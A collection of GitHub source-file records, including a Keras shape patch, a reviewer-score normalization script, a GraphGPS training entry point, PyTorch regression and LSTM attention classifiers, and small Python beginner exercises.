>= self.field_size[0] or new_y < 0 or new_y >= self.field_size[1]:\n # Borders\n return\n\n if self.maze[new_y][new_x] == 0:\n # Wall\n return\n\n self.canvas.move(self.player, dx * self.one_tile_size, dy * self.one_tile_size)\n\n self.x = new_x\n self.y = new_y\n\n if new_x == self.target[0] and new_y == self.target[1]:\n self.won = True\n self.displayWin()\n","repo_name":"waleko/gde-proga","sub_path":"src/Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20615157911","text":"import keras\n\n\ndef conv_output_length(input_length, filter_size,\n padding, stride, dilation=1):\n \"\"\"Determines output length of a convolution given input length.\n\n # Arguments\n input_length: integer.\n filter_size: integer.\n padding: one of `\"same\"`, `\"valid\"`, `\"full\"`.\n stride: integer.\n dilation: dilation rate, integer.\n\n # Returns\n The output length (integer).\n \"\"\"\n if input_length is None:\n return None\n assert padding in {'same', 'valid', 'full', 'causal'}\n dilated_filter_size = filter_size + (filter_size - 1) * (dilation - 1)\n if padding == 'same':\n _padding = (filter_size - 1) // 2\n return (input_length + 2 * _padding - dilated_filter_size) // stride + 1\n\n if padding == 'valid':\n output_length = input_length - dilated_filter_size + 1\n elif padding == 'causal':\n output_length = input_length\n elif padding == 'full':\n output_length = input_length + dilated_filter_size - 1\n return (output_length + stride - 1) // stride\n\n\ndef conv_compute_output_shape(self, input_shape):\n \"\"\"Compute 
the output dimension of a convolution.\"\"\"\n    if self.data_format == 'channels_last':\n        space = input_shape[1:-1]\n        new_space = []\n        for i in range(len(space)):\n            new_dim = conv_output_length(\n                space[i],\n                self.kernel_size[i],\n                padding=self.padding,\n                stride=self.strides[i],\n                dilation=self.dilation_rate[i])\n            new_space.append(new_dim)\n        return (input_shape[0],) + tuple(new_space) + (self.filters,)\n    if self.data_format == 'channels_first':\n        space = input_shape[2:]\n        new_space = []\n        for i in range(len(space)):\n            new_dim = conv_output_length(\n                space[i],\n                self.kernel_size[i],\n                padding=self.padding,\n                stride=self.strides[i],\n                dilation=self.dilation_rate[i])\n            new_space.append(new_dim)\n        return (input_shape[0], self.filters) + tuple(new_space)\n    return None\n\n\ndef pool_compute_output_shape(self, input_shape):\n    \"\"\"Compute the output dimension of a pooling.\"\"\"\n    if self.data_format == 'channels_first':\n        rows = input_shape[2]\n        cols = input_shape[3]\n    elif self.data_format == 'channels_last':\n        rows = input_shape[1]\n        cols = input_shape[2]\n    rows = conv_output_length(rows, self.pool_size[0],\n                              self.padding, self.strides[0])\n    cols = conv_output_length(cols, self.pool_size[1],\n                              self.padding, self.strides[1])\n    if self.data_format == 'channels_first':\n        return (input_shape[0], input_shape[1], rows, cols)\n    if self.data_format == 'channels_last':\n        return (input_shape[0], rows, cols, input_shape[3])\n    return None\n\n\ndef patch():\n    \"\"\"Apply the patches to the module.\"\"\"\n    keras.layers.MaxPooling2D.compute_output_shape = pool_compute_output_shape\n    keras.layers.Conv2D.compute_output_shape = conv_compute_output_shape\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/cv/ssd/models/patch_keras.py","file_name":"patch_keras.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} {"seq_id":"12481415715","text":"'''\nCreated on Mar 5, 2018\n\n@author: emigre459\n'''\nimport pandas as pd\nfrom collections import defaultdict\n\n\nincomplete_reviewers = defaultdict(list)\n\ndef import_data(filename):\n    '''\n    Imports data from EERE eXCHANGE CSV report called 'Review Details Grid.csv' and cleans it up prior to analysis.\n    Returns a cleaned dataframe, with 'cleaned' here meaning that incomplete review records are expunged\n    and review records with null values for the numeric rating are also removed. Also calculates the weighted\n    score for each review criterion and adds a column to the DataFrame called 'Weighted Original Score' to record it.\n    \n    filename: str. Indicates path relative to location in which this code is used as a module.\n    ''' \n    \n    '''\n    Assumed header format:\n    FOA Number - ignored\n    Submission Type - only types expected are 'Concept Paper' or 'Full Application'\n    Control Number\n    Topic\n    Project Title\n    Lead Organization\n    Reviewer Full Name\n    Review Status - only use entries wherein value here is \"Completed\"\n    Rating Title - can be considered synonymous with \"Scoring Criterion\"\n    Weaknesses\n    Strengths\n    Numeric Rating\n    Criteria Weight (as a percentage)\n    Average Overall Score for Reviewer - ignored\n    Average Overall Score for Submission - ignored\n    Weighted Original Score - added by this code\n    '''\n    \n    \n    #Note that there is a new row for every review criterion for every reviewer for every project \n    #(so 3 reviewers on project X using 2 review criteria = 3 * 2 = 6 rows)\n    df = pd.read_csv(filename, encoding = 'utf-8')\n    \n    \n    #Let's keep a record of which reviewers didn't complete their reviews, and the control numbers of the \n    #reviews in question\n    #We'll format as a dict of form {reviewerName: [control1, control2, etc.]}\n    \n    incomp_df = df[df['Review Status'] != 'Complete']\n    gpby = incomp_df.groupby(['Reviewer Full Name', 'Control Number'])\n    for name, _ in gpby:\n        incomplete_reviewers[name[0]].append(name[1])\n    \n    #Now that we know who they are, let's get rid of the offending rows to avoid confusion later\n    df.drop(incomp_df.index, inplace = True)\n    \n    #And let's also remove any rows in which the Numeric Rating is null\n    df.dropna(subset = ['Numeric Rating'], inplace = True)\n    \n    df['Weighted Original Score'] = df['Numeric Rating'] * df['Criteria Weight'] / 100\n    \n    print(\"These people didn't complete their reviews: \\n\\t{}\".format(incomplete_reviewers))\n    \n    return df\n\n\ndef reviewer_stats(df):\n    '''\n    Isolates scores from individual reviewers and returns each reviewer's mean score and standard deviation\n    as a tuple of pandas Series in the format (all means, all stdevs)\n    \n    df: pandas DataFrame. Cleaned df of the format returned by import_data()\n    '''\n    \n    reviewer_scores = df.groupby(['Reviewer Full Name', 'Control Number', 'Topic'])['Weighted Original Score'].sum()\n    reviewer_avgs = reviewer_scores.groupby('Reviewer Full Name').mean()\n    reviewer_stdevs = reviewer_scores.groupby('Reviewer Full Name').std(ddof=0)\n    \n    return reviewer_avgs, reviewer_stdevs\n\ndef calculate_z(row, reviewer_means, reviewer_stdDevs):\n    '''\n    Meant to be applied via the apply() method to a DataFrame of the same format as that output by import_data()\n    to calculate the z-score for each reviewer's weighted score.\n    \n    row: DataFrame row. Can have individual column values called by using row[column_name]\n    reviewer_means: pandas Series. Index values are unique reviewer names, element values are the average\n        Weighted Scores across all of that reviewer's reviews for this program.\n    reviewer_stdDevs: pandas Series. 
Index values are unique reviewer names, element values are the standard\n        deviations of the Weighted Scores across all of that reviewer's reviews for this program.\n    '''\n    #Assume this will be applied using df.apply(calculate_z, axis=1, args = (reviewer_means, reviewers_stdDevs))\n    \n    name = row['Reviewer Full Name']\n    if reviewer_stdDevs.loc[name] == 0:\n        return 0\n    else:\n        return (row['Weighted Original Score'] - reviewer_means.loc[name]) / reviewer_stdDevs.loc[name]\n\ndef normalize_scores(df, score_range):\n    '''\n    Takes each reviewer's total weighted score for each project, transforms it into a\n    z-score, then re-maps it on to a pre-defined normal distribution and returns a new DataFrame\n    that is comprised of 5 columns: Reviewer Full Name, Control Number, Weighted Original Score, \n    Weighted Score Z-Score, and Weighted Normalized Score\n    \n    df: pandas DataFrame. DataFrame of the format returned by import_data()\n    score_range: tuple of ints of the format (min_score, max_score). Defines the end points of the allowed\n        scoring range.\n    '''\n    \n    '''REMEMBER: z-score correction shouldn't be applied to each criterion's score \n    (which unfortunately was how I used it in the spreadsheet version of this, incorrectly) but rather\n    just correct the original weighted score at a project (not criterion) level\n    \n    z-score = (original_data - mean) / stddev\n    normalized_data = z-score * common_stddev + common_mean\n    '''\n    \n    reviewerStats = reviewer_stats(df)\n    \n    #We'll define the standard deviation of our new common distribution using the definition of a normal\n    #distribution as having 99.7% of its data within three standard deviations of the mean.\n    \n    stddev = (score_range[1] - score_range[0]) / 6\n    \n    #midpoint of the score range is defined as the mean of the distrib.\n    mean = ((score_range[1] - score_range[0]) / 2) + score_range[0]\n    \n    \n    reviewer_scores = df.groupby(['Reviewer Full Name', 'Control Number', 'Topic'])['Weighted Original Score'].sum()\n    output_df = pd.DataFrame(reviewer_scores)\n    output_df.reset_index(inplace = True)\n    #output_df.columns = ['Reviewer Full Name', 'Control Number', 'Topic', 'Weighted Original Score']\n    \n    output_df['Weighted Score Z-Score'] = output_df.apply(calculate_z, \n                                                          axis=1, \n                                                          args = (reviewerStats[0],\n                                                                  reviewerStats[1]))\n    \n    output_df['Weighted Normalized Score'] = (output_df['Weighted Score Z-Score'] * stddev) + mean\n    \n    #Let's make sure our new scores don't exceed the bounds of the scoring range\n    #(clamp only the score column)\n    col = 'Weighted Normalized Score'\n    output_df.loc[output_df[col] < score_range[0], col] = score_range[0]\n    output_df.loc[output_df[col] > score_range[1], col] = score_range[1]\n    \n    return output_df\n    \n
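# Worked example (added illustration): a harsh reviewer with mean 7 and stdev 1\n# who gives an 8 produces z = (8 - 7) / 1 = 1; for a (0, 10) range the common\n# distribution has mean 5 and stddev 10/6, so the normalized score is\n# 1 * (10/6) + 5 = 6.67.\n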
def tab_maker(df):\n    '''\n    Pulls out Topic names and returns a unique list of \n    Topic + Number entries that can be used as Excel tab/sheet names. Also \n    groups dataframe data by Topic name and returns a list of dataframes. Output\n    is a tuple of the form (names, dataframes)\n    \n    df: pandas DataFrame. DataFrame of the format returned by normalize_scores()\n    ''' \n    \n    tab_dfs = []\n    \n    topNum = df['Topic'].str.split(n=2, expand = True)[1]\n    tab_names = (\"Topic \" + topNum).unique()\n    \n    #Build one averaged dataframe per topic so the output matches the docstring\n    for topic in df['Topic'].unique():\n        temp_df = df[df['Topic'] == topic].groupby(['Topic', 'Control Number'], \n                                                   as_index = False)['Weighted Original Score'].mean()\n        tab_dfs.append(temp_df)\n    \n    return (tab_names, tab_dfs)\n\ndef summarize_proposals(df):\n    '''\n    Groups proposals by topic, then by control number/ID, then calculates\n    the average (original and normalized) score across reviewers for each\n    proposal and returns a dataframe with those averages and standard deviations.\n    \n    df: pandas DataFrame. DataFrame of the format returned by normalize_scores()\n    '''\n    \n    avg_orig = df.groupby(['Topic', 'Control Number'],\n                          as_index = False)['Weighted Original Score'].mean()\n    \n    avg_norm = df.groupby(['Topic', 'Control Number'],\n                          as_index = False)['Weighted Normalized Score'].mean()\n    \n    std_orig = df.groupby(['Topic', 'Control Number'])['Weighted Original Score'].std(ddof=0).reset_index()\n    \n    std_norm = df.groupby(['Topic', 'Control Number'])['Weighted Normalized Score'].std(ddof=0).reset_index()\n    \n    #Need to make sure the df we use to make our output df has proper column names\n    avg_orig.columns = ['Topic', 'Control Number', 'Average Original Score']\n    \n    summary_df = avg_orig\n    summary_df['Original Score StDev'] = std_orig['Weighted Original Score']\n    summary_df['Average Normalized Score'] = avg_norm['Weighted Normalized Score']\n    summary_df['Normalized Score StDev'] = std_norm['Weighted Normalized Score']\n    \n    return summary_df\n\ndef export_data(df, filename):\n    '''\n    Exports the results of normalization into an Excel file.\n    \n    df: pandas DataFrame. DataFrame of the format returned by normalize_scores()\n    filename: str. Defines the relative path and filename of the Excel file you want to export to.\n    '''\n    \n    if filename[-5:] != \".xlsx\":\n        filename = filename[:-4] + \".xlsx\"\n    \n    \n    writer = pd.ExcelWriter(filename)\n    \n    df.to_excel(writer, sheet_name = \"Full_Data\", \n                freeze_panes = (1,1))\n    summarize_proposals(df).to_excel(writer, \n                                     sheet_name = \"Summary_Data\", \n                                     freeze_panes = (1,1))\n    \n    #TODO: once tab_maker's output is wired in...\n    '''\n    sheet_names, sheet_dfs = tab_maker(df)\n    for name, sheet_df in zip(sheet_names, sheet_dfs):\n        sheet_df.to_excel(writer, sheet_name = name, freeze_panes = (1,1))\n    \n    '''\n    \n    writer.save()","repo_name":"emigre459/ReviewerNormalizing","sub_path":"Normalizer/ScoreNormalizer.py","file_name":"ScoreNormalizer.py","file_ext":"py","file_size_in_byte":10190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"72638497129","text":"import torch\nimport pandas as pd\nimport datetime\nimport numpy as np\nfrom sklearn import preprocessing\n\ntemp_df = pd.read_csv('temps.csv')\nprint(temp_df.head())\n\nyears = temp_df['year']\nmonths = temp_df['month']\ndays = temp_df['day']\n\ndates = [str(year) + '-' + str(month) + '-' + str(day) for year, month, day in zip(years, months, days)]\n\ndates = [datetime.datetime.strptime(i, '%Y-%m-%d') for i in dates]\nprint(dates)\n\n# Convert the data into a form a network can be built on (one-hot encoding)\n# Here the weekday strings are turned into label columns\nfeatures = pd.get_dummies(temp_df)\nprint(features.head(5))\n\nlabels = np.array(features['actual'])\nfeatures = features.drop('actual', axis=1)\n\n# Standardize the data; sklearn.preprocessing provides several common utility functions and transformer classes\n# fit_transform combines fit and transform: it both learns the statistics and applies the conversion\ninput_features = preprocessing.StandardScaler().fit_transform(features)\nprint(input_features[0])\n\n
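# Added note (illustrative): StandardScaler rescales each column to zero mean\n# and unit variance, x_std = (x - column_mean) / column_std, so a column\n# [0, 10] maps to [-1, 1].\n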
# Inputs and actual values\nx = torch.tensor(input_features, dtype=float)\ny = torch.tensor(labels, dtype=float)\n\n# First-layer parameters\nweights = torch.randn((14, 128), dtype=float, requires_grad=True)\nbiases = torch.randn(128, dtype=float, requires_grad=True)\n\n# Regression task\nweights2 = torch.randn((128, 1), dtype=float, requires_grad=True)\nbiases2 = torch.randn(1, dtype=float, requires_grad=True)\n\nlearn_rate = 0.001\nlosses = []\n\nfor i in range(1000):\n\n    # Compute the hidden layer\n    hidden = x.mm(weights) + biases\n    # Activation function, non-linear transform\n    hidden = torch.relu_(hidden)\n    # Predictions\n    pre_data = hidden.mm(weights2) + biases2\n\n    # Compute the loss\n    loss = torch.mean((pre_data - y) ** 2)\n    losses.append(loss.data.numpy())\n\n    if i % 100 == 0:\n        print('loss: ', loss)\n\n    # Backpropagate and update the parameters\n    loss.backward()\n\n    weights.data.add_(-learn_rate * weights.grad.data)\n    biases.data.add_(-learn_rate * biases.grad.data)\n    weights2.data.add_(-learn_rate * weights2.grad.data)\n    biases2.data.add_(-learn_rate * biases2.grad.data)\n\n    weights.grad.data.zero_()\n    biases.grad.data.zero_()\n    weights2.grad.data.zero_()\n    biases2.grad.data.zero_()\n","repo_name":"yudongjian/learn_image_process","sub_path":"pytorch操作/手工的深度学习预测温度.py","file_name":"手工的深度学习预测温度.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} {"seq_id":"23467843728","text":"# Finding odd and even numbers\n# def is_odd(a):\n#     a =1\n#     if a%2==0:\n#         return(\"It is an even number.\")\n#     else:\n#         return(\"It is an odd number.\")\n\n# Computing the average\n\n# def avg_numbers(*args): # use *args so the function works regardless of the number of inputs\n#     result = 0\n#     for i in args:\n#         result += i\n#     return result / len(args)\n    \n# avg_numbers(1,2)\n\ndef average(*args):\n    result = 0\n    for i in args:\n        result += i\n    return result / len(args)\n\nprint(average(1,3,5))\n\n\n\n","repo_name":"phaesol/Algorithm","sub_path":"2020.07.20.py","file_name":"2020.07.20.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"3455610295","text":"import json\nfrom difflib import get_close_matches\n\ndata = json.load(open(\"data.json\"))\n\n
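# Added note (illustrative): difflib.get_close_matches returns up to three\n# suggestions ranked by similarity, e.g.\n# get_close_matches('appel', ['ape', 'apple', 'peach', 'puppy']) -> ['apple', 'ape'],\n# which is what the \"did you mean\" prompts below rely on.\n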
Y or N?\" % get_close_matches(w, data.keys())[s]) == \"Y\":\n return data[get_close_matches(w, data.keys())[s]]\n s +=1\n if s == 3:\n return \"We didn't understand your entry\"\n else:\n return \"This word doesn't exist\"\n\nword = input(\"Your word: \")\n\n\noutput = translate(word)\n\nif type(output) == list:\n s = 1\n for item in output:\n print(s, item)\n s +=1\nelse:\n print(output)\n\n","repo_name":"Cynic1404/10_projects","sub_path":"1 project - Dictionary/my_pr.py","file_name":"my_pr.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30861098952","text":"import datetime\nimport os\nimport torch\nimport logging\n\nimport graphgps # noqa, register custom modules\nfrom graphgps.agg_runs import agg_runs\nfrom graphgps.optimizer.extra_optimizers import ExtendedSchedulerConfig\n\nfrom torch_geometric.graphgym.cmd_args import parse_args\nfrom torch_geometric.graphgym.config import (cfg, dump_cfg,\n set_cfg, load_cfg,\n makedirs_rm_exist)\nfrom torch_geometric.graphgym.loader import create_loader\nfrom torch_geometric.graphgym.logger import set_printing\nfrom torch_geometric.graphgym.optim import create_optimizer, \\\n create_scheduler, OptimizerConfig\nfrom torch_geometric.graphgym.model_builder import create_model\nfrom torch_geometric.graphgym.train import GraphGymDataModule, train\nfrom torch_geometric.graphgym.utils.comp_budget import params_count\nfrom torch_geometric.graphgym.utils.device import auto_select_device\nfrom torch_geometric.graphgym.register import train_dict\nfrom torch_geometric import seed_everything\n\nfrom graphgps.finetuning import load_pretrained_model_cfg, \\\n init_model_from_pretrained\nfrom graphgps.logger import create_logger\n\n\ntorch.backends.cuda.matmul.allow_tf32 = True # Default False in PyTorch 1.12+\ntorch.backends.cudnn.allow_tf32 = True # Default True\n\n\ndef new_optimizer_config(cfg):\n return OptimizerConfig(optimizer=cfg.optim.optimizer,\n base_lr=cfg.optim.base_lr,\n weight_decay=cfg.optim.weight_decay,\n momentum=cfg.optim.momentum)\n\n\ndef new_scheduler_config(cfg):\n return ExtendedSchedulerConfig(\n scheduler=cfg.optim.scheduler,\n steps=cfg.optim.steps, lr_decay=cfg.optim.lr_decay,\n max_epoch=cfg.optim.max_epoch, reduce_factor=cfg.optim.reduce_factor,\n schedule_patience=cfg.optim.schedule_patience, min_lr=cfg.optim.min_lr,\n num_warmup_epochs=cfg.optim.num_warmup_epochs,\n train_mode=cfg.train.mode, eval_period=cfg.train.eval_period)\n\n\ndef custom_set_out_dir(cfg, cfg_fname, name_tag):\n \"\"\"Set custom main output directory path to cfg.\n Include the config filename and name_tag in the new :obj:`cfg.out_dir`.\n\n Args:\n cfg (CfgNode): Configuration node\n cfg_fname (string): Filename for the yaml format configuration file\n name_tag (string): Additional name tag to identify this execution of the\n configuration file, specified in :obj:`cfg.name_tag`\n \"\"\"\n run_name = os.path.splitext(os.path.basename(cfg_fname))[0]\n run_name += f\"-{name_tag}\" if name_tag else \"\"\n cfg.out_dir = os.path.join(cfg.out_dir, run_name)\n\n\ndef custom_set_run_dir(cfg, run_id):\n \"\"\"Custom output directory naming for each experiment run.\n\n Args:\n cfg (CfgNode): Configuration node\n run_id (int): Main for-loop iter id (the random seed or dataset split)\n \"\"\"\n cfg.run_dir = os.path.join(cfg.out_dir, str(run_id))\n # Make output directory\n if cfg.train.auto_resume:\n os.makedirs(cfg.run_dir, exist_ok=True)\n else:\n 
makedirs_rm_exist(cfg.run_dir)\n\n\ndef run_loop_settings():\n \"\"\"Create main loop execution settings based on the current cfg.\n\n Configures the main execution loop to run in one of two modes:\n 1. 'multi-seed' - Reproduces default behaviour of GraphGym when\n args.repeats controls how many times the experiment run is repeated.\n Each iteration is executed with a random seed set to an increment from\n the previous one, starting at initial cfg.seed.\n 2. 'multi-split' - Executes the experiment run over multiple dataset splits,\n these can be multiple CV splits or multiple standard splits. The random\n seed is reset to the initial cfg.seed value for each run iteration.\n\n Returns:\n List of run IDs for each loop iteration\n List of rng seeds to loop over\n List of dataset split indices to loop over\n \"\"\"\n if len(cfg.run_multiple_splits) == 0:\n # 'multi-seed' run mode\n num_iterations = args.repeat\n seeds = [cfg.seed + x for x in range(num_iterations)]\n split_indices = [cfg.dataset.split_index] * num_iterations\n run_ids = seeds\n else:\n # 'multi-split' run mode\n if args.repeat != 1:\n raise NotImplementedError(\"Running multiple repeats of multiple \"\n \"splits in one run is not supported.\")\n num_iterations = len(cfg.run_multiple_splits)\n seeds = [cfg.seed] * num_iterations\n split_indices = cfg.run_multiple_splits\n run_ids = split_indices\n return run_ids, seeds, split_indices\n\n\nif __name__ == '__main__':\n # Load cmd line args\n args = parse_args()\n # Load config file\n set_cfg(cfg)\n load_cfg(cfg, args)\n custom_set_out_dir(cfg, args.cfg_file, cfg.name_tag)\n dump_cfg(cfg)\n # Set Pytorch environment\n torch.set_num_threads(cfg.num_threads)\n # Repeat for multiple experiment runs\n for run_id, seed, split_index in zip(*run_loop_settings()):\n # Set configurations for each run\n custom_set_run_dir(cfg, run_id)\n set_printing()\n cfg.dataset.split_index = split_index\n cfg.seed = seed\n cfg.run_id = run_id\n seed_everything(cfg.seed)\n auto_select_device()\n if cfg.pretrained.dir:\n cfg = load_pretrained_model_cfg(cfg)\n logging.info(f\"[*] Run ID {run_id}: seed={cfg.seed}, \"\n f\"split_index={cfg.dataset.split_index}\")\n logging.info(f\" Starting now: {datetime.datetime.now()}\")\n # Set machine learning pipeline\n loaders = create_loader()\n loggers = create_logger()\n model = create_model()\n if cfg.pretrained.dir:\n model = init_model_from_pretrained(\n model, cfg.pretrained.dir, cfg.pretrained.freeze_main,\n cfg.pretrained.reset_prediction_head, seed=cfg.seed\n )\n optimizer = create_optimizer(model.parameters(),\n new_optimizer_config(cfg))\n scheduler = create_scheduler(optimizer, new_scheduler_config(cfg))\n # Print model info\n logging.info(model)\n logging.info(cfg)\n cfg.params = params_count(model)\n logging.info('Num parameters: %s', cfg.params)\n # Start training\n if cfg.train.mode == 'standard':\n if cfg.wandb.use:\n logging.warning(\"[W] WandB logging is not supported with the \"\n \"default train.mode, set it to `custom`\")\n datamodule = GraphGymDataModule()\n train(model, datamodule, logger=True)\n else:\n train_dict[cfg.train.mode](loggers, loaders, model, optimizer,\n scheduler)\n # Aggregate results from different seeds\n try:\n agg_runs(cfg.out_dir, cfg.metric_best)\n except Exception as e:\n logging.info(f\"Failed when trying to aggregate multiple runs: {e}\")\n # When being launched in batch mode, mark a yaml as done\n if args.mark_done:\n os.rename(args.cfg_file, f'{args.cfg_file}_done')\n logging.info(f\"[*] All done: 
{datetime.datetime.now()}\")\n","repo_name":"rampasek/GraphGPS","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7245,"program_lang":"python","lang":"en","doc_type":"code","stars":495,"dataset":"github-code","pt":"53"} +{"seq_id":"9186948461","text":"import numpy as np\nimport pandas as pd \n\nclass Annealing():\n\n def make(self):\n T = 14700*2\n M = 2 \n R = 0.5\n t = np.arange(0,T)\n tau = np.clip(t%np.ceil(T/M)/(T/M),0,1)\n beta = [t/R if t<=R else 1 for t in tau]\n beta = np.array(beta)\n df = pd.DataFrame(beta, columns=[\"beta\"])\n df.to_csv(\"../data/annealing.csv\", index=False) \n print(\"*--Check data folder--*\")\n\n\nif __name__==\"__main__\":\n an = Annealing()\n an.make()\n\n","repo_name":"fxnnxc/data","sub_path":"make_data/type1/beta_annealing.py","file_name":"beta_annealing.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21935886085","text":"from custom_layers import custom_word_embedding\nfrom custom_layers import Attention\nfrom utils import load_emb_weights\nimport torch\nfrom torch import nn\n\nclass classifier(nn.Module):\n\n #define all the layers used in model\n def __init__(self, embedding_dim, hidden_dim, output_dim, n_layers, embed_weights,\n bidirectional=False, glove=True, init=True, dropout=0):\n\n #Constructor\n super().__init__()\n self.bidirectional = bidirectional\n\n if glove:\n # Embedding layer using GloVe\n self.embedding = custom_word_embedding(embed_weights)\n else:\n # Embedding layer without GloVe\n self.embedding = nn.Embedding(embed_weights.shape[0], embed_weights.shape[1])\n\n # LSTM layer and initialization\n self.lstm = nn.LSTM(embedding_dim,\n hidden_dim,\n num_layers=n_layers,\n bidirectional=bidirectional,\n dropout=dropout,\n batch_first=True)\n if init:\n for name, param in self.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n\n # Dense layer with initialization\n if self.bidirectional:\n self.fc = nn.Linear(hidden_dim * 2, output_dim)\n else:\n self.fc = nn.Linear(hidden_dim * 1, output_dim)\n if init:\n nn.init.xavier_normal_(self.fc.weight)\n #activation function\n #self.act = nn.Sigmoid()\n self.act = nn.Softmax(dim = 1)\n\n def forward(self, text, text_lengths=None):\n #text = [batch size,sent_length]\n text = text.view(text.size()[1], -1) # Remove the useless 1st axis\n embedded = self.embedding(text.long())\n #embedded = [batch size, sent_len, emb dim]\n embedded = embedded.float().cuda()\n #packed sequence\n #packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, text_lengths,batch_first=True)\n #si = embedded.size()\n #embedded = embedded.view(si[1],si[2],si[3])\n packed_output, (hidden, cell) = self.lstm(embedded)\n\n #hidden = [batch size, num layers * num directions,hid dim]\n #cell = [batch size, num layers * num directions,hid dim]\n\n #concat the final forward and backward hidden state\n if self.bidirectional:\n hidden = torch.cat((hidden[-2,:,:], hidden[-1,:,:]), dim = 1)\n\n #hidden = [batch size, hid dim * num directions]\n dense_outputs=self.fc(hidden)\n\n #Final activation function\n outputs=self.act(dense_outputs)\n\n return outputs\n\n\n\nclass AT_LSTM(nn.Module):\n\n #define all the layers used in model\n def __init__(self, embedding_dim, aspect_embedding_dim, hidden_dim,\n output_dim, n_layers, embed_weights, at=True, ae=False, dropout=0):\n\n #Constructor\n super().__init__()\n # ATAE 
?\n        self.ae = ae\n        self.at = at\n        self.embedding_dim = embedding_dim\n        # Embedding layer using GloVe or fasttext\n        self.embedding = custom_word_embedding(embed_weights)\n\n        # Embedding layer using Glove for aspects\n        self.aspects_embedding = custom_word_embedding(embed_weights)\n\n        # Embedding layer without GloVe\n        # self.embedding = nn.Embedding(emb_mat.shape[0], emb_mat.shape[1])\n\n        # LSTM layer and initialization\n        if self.ae:\n            self.lstm = nn.LSTM(embedding_dim*2,\n                                hidden_dim,\n                                num_layers=n_layers,\n                                bidirectional=False,\n                                dropout=dropout,\n                                batch_first=True)\n        else:\n            self.lstm = nn.LSTM(embedding_dim,\n                                hidden_dim,\n                                num_layers=n_layers,\n                                bidirectional=False,\n                                dropout=dropout,\n                                batch_first=True)\n\n        for name, param in self.lstm.named_parameters():\n            if 'bias' in name:\n                nn.init.constant_(param, 0.0)\n            elif 'weight' in name:\n                nn.init.xavier_normal_(param)\n\n        # Attention layer with initialization\n        if self.at:\n            self.attention = Attention(aspect_embedding_dim, hidden_dim)\n            self.attention.xavier_init()\n\n        # Final dense layer with initialization\n        self.fc = nn.Linear(embedding_dim, output_dim)\n        nn.init.xavier_normal_(self.fc.weight)\n\n        #activation function\n        #self.act = nn.Sigmoid()\n        self.act = nn.Softmax(dim = 1)\n\n    def forward(self, inp, text_lengths=None):\n\n        text = inp[0].view(inp[0].size()[1], -1) # Remove the useless 1st axis\n        #text = [batch_size, sent_length]\n        categories = inp[1].view(inp[1].size()[1]).long() #categories = [batch_size]\n\n        embedded = self.embedding(text.long())\n\n        # ATAE\n        if self.ae:\n            embedded_input_aspect = self.aspects_embedding(categories)\n            embedded_input_aspect = embedded_input_aspect.view(embedded_input_aspect.size()[0],1,self.embedding_dim)\n            embedded_input_aspect = embedded_input_aspect.repeat(1,embedded.size()[1],1)\n            embedded = torch.cat((embedded, embedded_input_aspect), -1)\n\n        #packed sequence\n        #packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, text_lengths,batch_first=True)\n        #si = embedded.size()\n        #embedded = embedded.view(si[1],si[2],si[3])\n        embedded = embedded.float().cuda()\n\n        packed_output, (hidden, cell) = self.lstm(embedded)\n        #packed_output = [batch_size, sent_length, hid_dim]\n        #hidden = [batch size, num layers * num directions,hid dim]\n        #cell = [batch size, num layers * num directions,hid dim]\n        embedded_aspects = self.aspects_embedding(categories)\n        embedded_aspects = embedded_aspects.float().cuda()\n        #embedded_aspects = [batch_size, aspect_embedding_dim]\n\n        if self.at:\n            final_hidden = self.attention(embedded, embedded_aspects, packed_output)\n        else:\n            final_hidden = hidden\n        #hidden = [batch size, hid dim * num directions]\n        dense_outputs=self.fc(final_hidden)\n\n        #Final activation function\n        outputs=self.act(dense_outputs)\n\n        return outputs\n","repo_name":"Volkaa/DD2424_Project","sub_path":"code/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"27678091889","text":"#Write a program that takes an integer input from the user and counts down from that number to 1 using a while loop\n\nuser = int(input(\"Enter The Number : - \"))\n\nwhile True:\n    if user == 0:\n        break\n    else:\n        print(f\"{user} seconds left\")\n        user = user - 
1","repo_name":"DevilShubhtaken/python","sub_path":"Loops/While_LOOP/countdown_timer.py","file_name":"countdown_timer.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6739282592","text":"#Exercise2\nword= \"banana\"\nprint(str(word.count('a'))) # count the occurances of 'a' in 'word'\n\n#Exercise 3\nprint(word[::-1]) # print word backwards\ndef is_palindrome(word1): # function to check if string is palindrome\n return word1==word1[::-1]\nprint(str(is_palindrome(\"able was I ere I saw elba\")))\nlong_word=\"Pneumonoultramicroscopicsilicovolcanoconiosis\"\nprint(long_word[0:25:3]) # print every thrid symbol of the given string starting from symbol 0 upto symbol 24\n\ndef any_lowercase5(s):\n for c in s:\n if not c.islower():\n return False\n return True\n\nprint(str(any_lowercase5(\"asdawdadwdqad\")))\n\n\ndef rotate_word(word,number):\n new_string=\"\"\n for letter in word:\n new_string=new_string+ chr(ord(letter)+number)\n return 